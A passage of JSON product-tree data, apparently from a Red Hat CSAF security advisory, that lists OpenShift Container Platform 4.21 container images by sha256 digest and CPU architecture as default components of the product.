"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
